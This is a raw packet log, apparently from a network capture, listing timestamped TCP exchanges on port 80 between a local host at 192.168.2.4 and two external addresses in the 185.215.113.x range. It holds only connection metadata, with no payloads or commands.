Dec 14, 2024 23:58:44.966828108 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:44.966928959 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:44.966979027 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:44.967005968 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:44.967036009 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:44.967082977 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:44.967114925 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:45.046180010 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.046233892 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.046379089 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.046379089 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.048106909 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.048171043 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.048207045 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.048255920 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.051479101 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.051604033 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.051731110 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.051731110 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.055841923 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.055903912 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.056037903 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.056039095 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.060168982 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.060292959 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.060378075 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.060378075 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.064539909 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.064673901 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.064740896 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.064740896 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.068969965 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.069077015 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.069224119 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.069224119 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.073268890 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.073338032 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.073389053 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.073438883 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.077641964 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.077764034 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.077857018 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.077857971 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.082010031 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.082130909 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.082220078 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.082220078 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.086363077 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.086426973 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.086515903 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.086570024 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.090722084 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.090823889 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.090874910 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.090876102 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.095105886 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.095264912 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.095280886 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.095410109 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.099452019 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.099538088 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.099630117 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.099630117 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.103359938 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.103471994 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.103651047 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.103652000 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.107253075 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.107338905 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.107391119 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.107462883 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.111294031 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.111362934 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.111494064 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.111538887 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.115089893 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.115211964 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.115274906 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.115274906 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.119031906 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.119148970 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.119251013 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.119251966 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.122899055 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.122960091 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.123039961 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.123085976 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.126826048 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.126952887 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.126995087 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.126996040 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.130707026 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.130826950 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.130877972 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.130877972 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.134685993 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.134814978 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.134869099 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.134870052 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.138555050 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.138696909 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.138722897 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.138850927 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.142424107 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.142612934 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.142618895 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.142702103 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.146328926 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.146514893 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.146538973 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.146589041 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.150250912 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.150386095 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.150444031 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.150535107 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.154140949 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.154272079 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.154320955 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.154426098 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.158080101 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.158261061 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.158279896 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.158368111 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.161964893 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.162134886 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.162161112 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.162247896 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.165858030 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.166028976 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.166080952 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.166081905 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.169771910 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.169884920 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.169965029 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.169965982 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.173667908 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.173866034 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.173871994 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.173954010 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.177550077 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.177736044 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.237903118 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.238080025 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.238090992 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.238168001 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.238837004 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.238993883 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.239005089 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.239094019 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.242136955 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.242331982 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.242341042 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.242429018 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.245438099 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.245563984 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.245630980 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.245630980 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.248742104 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.248822927 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.248851061 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.248900890 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.251961946 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.252178907 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.252209902 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.252258062 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.255009890 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.255171061 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.255223036 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.255223036 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.258049011 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.258225918 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.258244038 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.258333921 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.260972977 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.261049032 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.261105061 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.261177063 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.263864994 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.263994932 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.264072895 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.264074087 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.266711950 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.266832113 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.266987085 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.266988039 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.269545078 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.269620895 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.269670963 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.269854069 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.272349119 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.272399902 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.272416115 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.272465944 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.274981022 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.275093079 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.275135040 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.275183916 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.277717113 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.277781963 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.277857065 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.277911901 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.280340910 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.280409098 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.280491114 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.280548096 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.282987118 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.283032894 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.283082008 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.283148050 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.285620928 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.285715103 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.285715103 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.285765886 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.288141966 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.288203955 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.288266897 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.288315058 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.290667057 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.290724039 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.290787935 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.290832043 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.293186903 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.293241978 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.293307066 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.293442011 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.295691013 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.295783043 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.295819044 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.295862913 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.298151016 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.298201084 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.298254967 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.298300982 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.300596952 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.300656080 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.300733089 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.300776958 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.303040028 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.303157091 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.303189039 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.303205967 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.304464102 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.304528952 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.304629087 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.304671049 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.305881977 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.306005955 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.306025028 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.306073904 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.307334900 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.307396889 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.307452917 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.307502031 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.308805943 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.308856964 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.308907032 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.308954954 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.310210943 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.310265064 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.310350895 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.310399055 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.311647892 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.311702967 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.311788082 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.311836004 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.313325882 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.313390970 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.313488960 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.313538074 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.314585924 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.314640999 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.314701080 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.314749956 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.316160917 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.316246033 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.316318989 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.316369057 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.317492962 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.317543983 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.317608118 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.317655087 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.318937063 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.318989038 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.319046974 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.319092035 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.320382118 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.320436001 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.320509911 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.320557117 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.321805000 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.321863890 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.321949959 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.321999073 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.323235989 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.323286057 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.323389053 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.323437929 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.324688911 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.324738979 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.324825048 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.324877024 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.326157093 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.326251984 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.326271057 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.326309919 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.327610970 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.327666044 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.327739954 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.327786922 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.329035997 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.329087019 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.329158068 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.329209089 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.330498934 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.330549002 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.330610037 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.330656052 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.331932068 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.331990004 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.332052946 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.332102060 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.333375931 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.333441973 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.333513975 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.333564043 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.334837914 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.334892988 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.334966898 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.335017920 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.336329937 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.336385012 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.336425066 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.336478949 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.337739944 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.337799072 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.337881088 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.337932110 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.339256048 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.339308977 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.339350939 CET	49863	80	192.168.2.4	185.215.113.16
